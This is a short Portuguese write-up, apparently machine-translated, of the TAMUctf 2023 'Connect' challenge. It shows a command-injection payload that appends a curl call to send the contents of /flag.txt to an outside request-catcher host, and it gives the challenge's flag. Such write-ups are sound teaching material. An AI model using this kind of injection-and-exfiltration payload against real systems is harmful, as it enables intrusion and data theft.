TAMUctf 2023 — Conectar redação

May 01 2023
Este desafio é criado por Mr. Blade Baixe o connect.

Este desafio é criado por Mr. Blade

Baixe o arquivo connect.zip. Temos app.py

Eu o modifiquei para poder executá-lo e testá-lo localmente.

Podemos adicionar mais comandos adicionando ; .

Eu criei um apanhador de solicitações comhttps://requestcatcher.com/para capturar o pedido.

Vamos fazer injeção de comando adicionando ; curl -s https://flag.requestcatcher.com/$(cat /flag.txt)

O caminho da bandeira é mencionado na descrição do desafio.

Eu usei arroto e url codificou a carga útil. Vamos ver o coletor de solicitação.

A bandeira é gigem{p00r_f1lt3rs_m4k3_f0r_p00r_s3cur1ty}.

Obrigado por ler.

Feliz Hacking!